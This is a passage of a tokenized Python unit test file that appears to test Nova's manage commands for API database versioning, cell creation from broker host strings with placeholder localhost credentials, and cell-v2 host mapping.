dedent|''
dedent|''
name|'class'
name|'ApiDbCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ApiDbCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'ApiDbCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'sqla_migration'
op|','
string|"'db_version'"
op|','
name|'return_value'
op|'='
number|'2'
op|')'
newline|'\n'
DECL|member|test_version
name|'def'
name|'test_version'
op|'('
name|'self'
op|','
name|'sqla_migrate'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'version'
op|'('
op|')'
newline|'\n'
name|'sqla_migrate'
op|'.'
name|'assert_called_once_with'
op|'('
name|'database'
op|'='
string|"'api'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'sqla_migration'
op|','
string|"'db_sync'"
op|')'
newline|'\n'
DECL|member|test_sync
name|'def'
name|'test_sync'
op|'('
name|'self'
op|','
name|'sqla_sync'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'sync'
op|'('
name|'version'
op|'='
number|'4'
op|')'
newline|'\n'
name|'sqla_sync'
op|'.'
name|'assert_called_once_with'
op|'('
name|'version'
op|'='
number|'4'
op|','
name|'database'
op|'='
string|"'api'"
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|CellCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'CellCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'CellCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'CellCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_multiple
dedent|''
name|'def'
name|'test_create_transport_hosts_multiple'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method\n when broker_hosts is set.\n """'
newline|'\n'
name|'brokers'
op|'='
string|'"127.0.0.1:5672,127.0.0.2:5671"'
newline|'\n'
name|'thosts'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|'('
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
op|'='
name|'brokers'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'len'
op|'('
name|'thosts'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.1'"
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'5672'
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.2'"
op|','
name|'thosts'
op|'['
number|'1'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'5671'
op|','
name|'thosts'
op|'['
number|'1'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_single
dedent|''
name|'def'
name|'test_create_transport_hosts_single'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when hostname is passed."""'
newline|'\n'
name|'thosts'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|'('
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'hostname'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'port'
op|'='
number|'80'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'len'
op|'('
name|'thosts'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.1'"
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'80'
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_single_broker
dedent|''
name|'def'
name|'test_create_transport_hosts_single_broker'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method for single broker_hosts."""'
newline|'\n'
name|'thosts'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|'('
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5672'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'len'
op|'('
name|'thosts'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.1'"
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'5672'
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_both
dedent|''
name|'def'
name|'test_create_transport_hosts_both'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when both broker_hosts\n and hostname/port are passed.\n """'
newline|'\n'
name|'thosts'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|'('
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5672'"
op|','
nl|'\n'
name|'hostname'
op|'='
string|"'127.0.0.2'"
op|','
name|'port'
op|'='
number|'80'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'len'
op|'('
name|'thosts'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.1'"
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'5672'
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_wrong_val
dedent|''
name|'def'
name|'test_create_transport_hosts_wrong_val'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when broker_hosts\n    is wrongly specified\n    """'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'ValueError'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|','
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5672,127.0.0.1'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_wrong_port_val
dedent|''
name|'def'
name|'test_create_transport_hosts_wrong_port_val'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when port in\n    broker_hosts is wrongly specified\n    """'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'ValueError'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|','
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_wrong_port_arg
dedent|''
name|'def'
name|'test_create_transport_hosts_wrong_port_arg'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when port\n    argument is wrongly specified\n    """'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'ValueError'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|','
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'hostname'
op|'='
string|"'127.0.0.1'"
op|','
name|'port'
op|'='
string|"'ab'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'context'
op|','
string|"'get_admin_context'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'cell_create'"
op|')'
newline|'\n'
DECL|member|test_create_broker_hosts
name|'def'
name|'test_create_broker_hosts'
op|'('
name|'self'
op|','
name|'mock_db_cell_create'
op|','
name|'mock_ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the create function when broker_hosts is\n passed\n """'
newline|'\n'
name|'cell_tp_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:5432"'
newline|'\n'
name|'cell_tp_url'
op|'+='
string|'",guest:devstack@127.0.0.2:9999/"'
newline|'\n'
name|'ctxt'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'mock_ctxt'
op|'.'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'create'
op|'('
string|'"test"'
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5432,127.0.0.2:9999'"
op|','
nl|'\n'
name|'woffset'
op|'='
number|'0'
op|','
name|'wscale'
op|'='
number|'0'
op|','
nl|'\n'
name|'username'
op|'='
string|'"guest"'
op|','
name|'password'
op|'='
string|'"devstack"'
op|')'
newline|'\n'
name|'exp_values'
op|'='
op|'{'
string|"'name'"
op|':'
string|'"test"'
op|','
nl|'\n'
string|"'is_parent'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'transport_url'"
op|':'
name|'cell_tp_url'
op|','
nl|'\n'
string|"'weight_offset'"
op|':'
number|'0.0'
op|','
nl|'\n'
string|"'weight_scale'"
op|':'
number|'0.0'
op|'}'
newline|'\n'
name|'mock_db_cell_create'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
name|'exp_values'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'context'
op|','
string|"'get_admin_context'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'cell_create'"
op|')'
newline|'\n'
DECL|member|test_create_broker_hosts_with_url_decoding_fix
name|'def'
name|'test_create_broker_hosts_with_url_decoding_fix'
op|'('
name|'self'
op|','
nl|'\n'
name|'mock_db_cell_create'
op|','
nl|'\n'
name|'mock_ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the create function when broker_hosts is\n passed with credentials containing special characters\n """'
newline|'\n'
name|'cell_tp_url'
op|'='
string|'"fake://the=user:the=password@127.0.0.1:5432/"'
newline|'\n'
name|'ctxt'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'mock_ctxt'
op|'.'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'create'
op|'('
string|'"test"'
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5432'"
op|','
nl|'\n'
name|'woffset'
op|'='
number|'0'
op|','
name|'wscale'
op|'='
number|'0'
op|','
nl|'\n'
name|'username'
op|'='
string|'"the=user"'
op|','
nl|'\n'
name|'password'
op|'='
string|'"the=password"'
op|')'
newline|'\n'
name|'exp_values'
op|'='
op|'{'
string|"'name'"
op|':'
string|'"test"'
op|','
nl|'\n'
string|"'is_parent'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'transport_url'"
op|':'
name|'cell_tp_url'
op|','
nl|'\n'
string|"'weight_offset'"
op|':'
number|'0.0'
op|','
nl|'\n'
string|"'weight_scale'"
op|':'
number|'0.0'
op|'}'
newline|'\n'
name|'mock_db_cell_create'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
name|'exp_values'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'context'
op|','
string|"'get_admin_context'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'cell_create'"
op|')'
newline|'\n'
DECL|member|test_create_hostname
name|'def'
name|'test_create_hostname'
op|'('
name|'self'
op|','
name|'mock_db_cell_create'
op|','
name|'mock_ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the create function when hostname and port is\n passed\n """'
newline|'\n'
name|'cell_tp_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'ctxt'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'mock_ctxt'
op|'.'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'create'
op|'('
string|'"test"'
op|','
nl|'\n'
name|'hostname'
op|'='
string|"'127.0.0.1'"
op|','
name|'port'
op|'='
string|'"9999"'
op|','
nl|'\n'
name|'woffset'
op|'='
number|'0'
op|','
name|'wscale'
op|'='
number|'0'
op|','
nl|'\n'
name|'username'
op|'='
string|'"guest"'
op|','
name|'password'
op|'='
string|'"devstack"'
op|')'
newline|'\n'
name|'exp_values'
op|'='
op|'{'
string|"'name'"
op|':'
string|'"test"'
op|','
nl|'\n'
string|"'is_parent'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'transport_url'"
op|':'
name|'cell_tp_url'
op|','
nl|'\n'
string|"'weight_offset'"
op|':'
number|'0.0'
op|','
nl|'\n'
string|"'weight_scale'"
op|':'
number|'0.0'
op|'}'
newline|'\n'
name|'mock_db_cell_create'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
name|'exp_values'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|CellV2CommandsTestCase
dedent|''
dedent|''
name|'class'
name|'CellV2CommandsTestCase'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'CellV2CommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'CellV2Commands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell_and_hosts
dedent|''
name|'def'
name|'test_map_cell_and_hosts'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Create some fake compute nodes and check if they get host mappings'
nl|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'values'
op|'='
op|'{'
nl|'\n'
string|"'vcpus'"
op|':'
number|'4'
op|','
nl|'\n'
string|"'memory_mb'"
op|':'
number|'4096'
op|','
nl|'\n'
string|"'local_gb'"
op|':'
number|'1024'
op|','
nl|'\n'
string|"'vcpus_used'"
op|':'
number|'2'
op|','
nl|'\n'
string|"'memory_mb_used'"
op|':'
number|'2048'
op|','
nl|'\n'
string|"'local_gb_used'"
op|':'
number|'512'
op|','
nl|'\n'
string|"'hypervisor_type'"
op|':'
string|"'Hyper-Dan-VM-ware'"
op|','
nl|'\n'
string|"'hypervisor_version'"
op|':'
number|'1001'
op|','
nl|'\n'
string|"'cpu_info'"
op|':'
string|"'Schmintel i786'"
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'compute_node'
op|'='
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
op|'**'
name|'values'
op|')'
newline|'\n'
name|'compute_node'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
dedent|''
name|'cell_transport_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell_and_hosts'
op|'('
name|'cell_transport_url'
op|','
name|'name'
op|'='
string|"'ssd'"
op|','
nl|'\n'
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'cell_mapping_uuid'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
comment|'# Verify the cell mapping'
nl|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'get_by_uuid'
op|'('
name|'ctxt'
op|','
name|'cell_mapping_uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'ssd'"
op|','
name|'cell_mapping'
op|'.'
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'cell_transport_url'
op|','
name|'cell_mapping'
op|'.'
name|'transport_url'
op|')'
newline|'\n'
comment|'# Verify the host mappings'
nl|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'host_mapping'
op|'='
name|'objects'
op|'.'
name|'HostMapping'
op|'.'
name|'get_by_host'
op|'('
name|'ctxt'
op|','
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'cell_mapping'
op|'.'
name|'uuid'
op|','
name|'host_mapping'
op|'.'
name|'cell_mapping'
op|'.'
name|'uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell_and_hosts_duplicate
dedent|''
dedent|''
name|'def'
name|'test_map_cell_and_hosts_duplicate'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Create a cell mapping and hosts and check that nothing new is created'
nl|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'cell_mapping_uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'uuid'
op|'='
name|'cell_mapping_uuid'
op|','
name|'name'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'transport_url'
op|'='
string|"'fake://'"
op|','
name|'database_connection'
op|'='
string|"'fake://'"
op|')'
newline|'\n'
name|'cell_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
comment|'# Create compute nodes that will map to the cell'
nl|'\n'
name|'values'
op|'='
op|'{'
nl|'\n'
string|"'vcpus'"
op|':'
number|'4'
op|','
nl|'\n'
string|"'memory_mb'"
op|':'
number|'4096'
op|','
nl|'\n'
string|"'local_gb'"
op|':'
number|'1024'
op|','
nl|'\n'
string|"'vcpus_used'"
op|':'
number|'2'
op|','
nl|'\n'
string|"'memory_mb_used'"
op|':'
number|'2048'
op|','
nl|'\n'
string|"'local_gb_used'"
op|':'
number|'512'
op|','
nl|'\n'
string|"'hypervisor_type'"
op|':'
string|"'Hyper-Dan-VM-ware'"
op|','
nl|'\n'
string|"'hypervisor_version'"
op|':'
number|'1001'
op|','
nl|'\n'
string|"'cpu_info'"
op|':'
string|"'Schmintel i786'"
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'compute_node'
op|'='
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
op|'**'
name|'values'
op|')'
newline|'\n'
name|'compute_node'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
name|'host_mapping'
op|'='
name|'objects'
op|'.'
name|'HostMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
name|'cell_mapping'
op|'='
name|'cell_mapping'
op|')'
newline|'\n'
name|'host_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
dedent|''
name|'cell_transport_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'retval'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell_and_hosts'
op|'('
name|'cell_transport_url'
op|','
nl|'\n'
name|'name'
op|'='
string|"'ssd'"
op|','
nl|'\n'
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'retval'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'='
string|"''"
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'expected'
op|'+='
op|'('
string|"'Host host%s is already mapped to cell %s\\n'"
op|'%'
nl|'\n'
op|'('
name|'i'
op|','
name|'cell_mapping_uuid'
op|')'
op|')'
newline|'\n'
dedent|''
name|'expected'
op|'+='
string|"'All hosts are already mapped to cell(s), exiting.'"
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell_and_hosts_partial_update
dedent|''
name|'def'
name|'test_map_cell_and_hosts_partial_update'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Create a cell mapping and partial hosts and check that'
nl|'\n'
comment|'# missing HostMappings are created'
nl|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'cell_mapping_uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'uuid'
op|'='
name|'cell_mapping_uuid'
op|','
name|'name'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'transport_url'
op|'='
string|"'fake://'"
op|','
name|'database_connection'
op|'='
string|"'fake://'"
op|')'
newline|'\n'
name|'cell_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
comment|'# Create compute nodes that will map to the cell'
nl|'\n'
name|'values'
op|'='
op|'{'
nl|'\n'
string|"'vcpus'"
op|':'
number|'4'
op|','
nl|'\n'
string|"'memory_mb'"
op|':'
number|'4096'
op|','
nl|'\n'
string|"'local_gb'"
op|':'
number|'1024'
op|','
nl|'\n'
string|"'vcpus_used'"
op|':'
number|'2'
op|','
nl|'\n'
string|"'memory_mb_used'"
op|':'
number|'2048'
op|','
nl|'\n'
string|"'local_gb_used'"
op|':'
number|'512'
op|','
nl|'\n'
string|"'hypervisor_type'"
op|':'
string|"'Hyper-Dan-VM-ware'"
op|','
nl|'\n'
string|"'hypervisor_version'"
op|':'
number|'1001'
op|','
nl|'\n'
string|"'cpu_info'"
op|':'
string|"'Schmintel i786'"
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'compute_node'
op|'='
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
op|'**'
name|'values'
op|')'
newline|'\n'
name|'compute_node'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
comment|'# Only create 2 existing HostMappings out of 3'
nl|'\n'
dedent|''
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'2'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'host_mapping'
op|'='
name|'objects'
op|'.'
name|'HostMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
name|'cell_mapping'
op|'='
name|'cell_mapping'
op|')'
newline|'\n'
name|'host_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
dedent|''
name|'cell_transport_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell_and_hosts'
op|'('
name|'cell_transport_url'
op|','
nl|'\n'
name|'name'
op|'='
string|"'ssd'"
op|','
nl|'\n'
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
comment|'# Verify the HostMapping for the last host was created'
nl|'\n'
name|'host_mapping'
op|'='
name|'objects'
op|'.'
name|'HostMapping'
op|'.'
name|'get_by_host'
op|'('
name|'ctxt'
op|','
string|"'host2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'cell_mapping'
op|'.'
name|'uuid'
op|','
name|'host_mapping'
op|'.'
name|'cell_mapping'
op|'.'
name|'uuid'
op|')'
newline|'\n'
comment|'# Verify the output'
nl|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'='
string|"''"
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'2'
op|')'
op|':'
newline|'\n'
indent|' '
name|'expected'
op|'+='
op|'('
string|"'Host host%s is already mapped to cell %s\\n'"
op|'%'
nl|'\n'
op|'('
name|'i'
op|','
name|'cell_mapping_uuid'
op|')'
op|')'
newline|'\n'
comment|'# The expected CellMapping UUID for the last host should be the same'
nl|'\n'
dedent|''
name|'expected'
op|'+='
name|'cell_mapping'
op|'.'
name|'uuid'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell_and_hosts_no_hosts_found
dedent|''
name|'def'
name|'test_map_cell_and_hosts_no_hosts_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cell_transport_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'retval'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell_and_hosts'
op|'('
name|'cell_transport_url'
op|','
nl|'\n'
name|'name'
op|'='
string|"'ssd'"
op|','
nl|'\n'
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'retval'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'='
string|"'No hosts found to map to cell, exiting.'"
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_instances
dedent|''
name|'def'
name|'test_map_instances'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
string|"'fake-user'"
op|','
string|"'fake_project'"
op|')'
newline|'\n'
name|'cell_uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
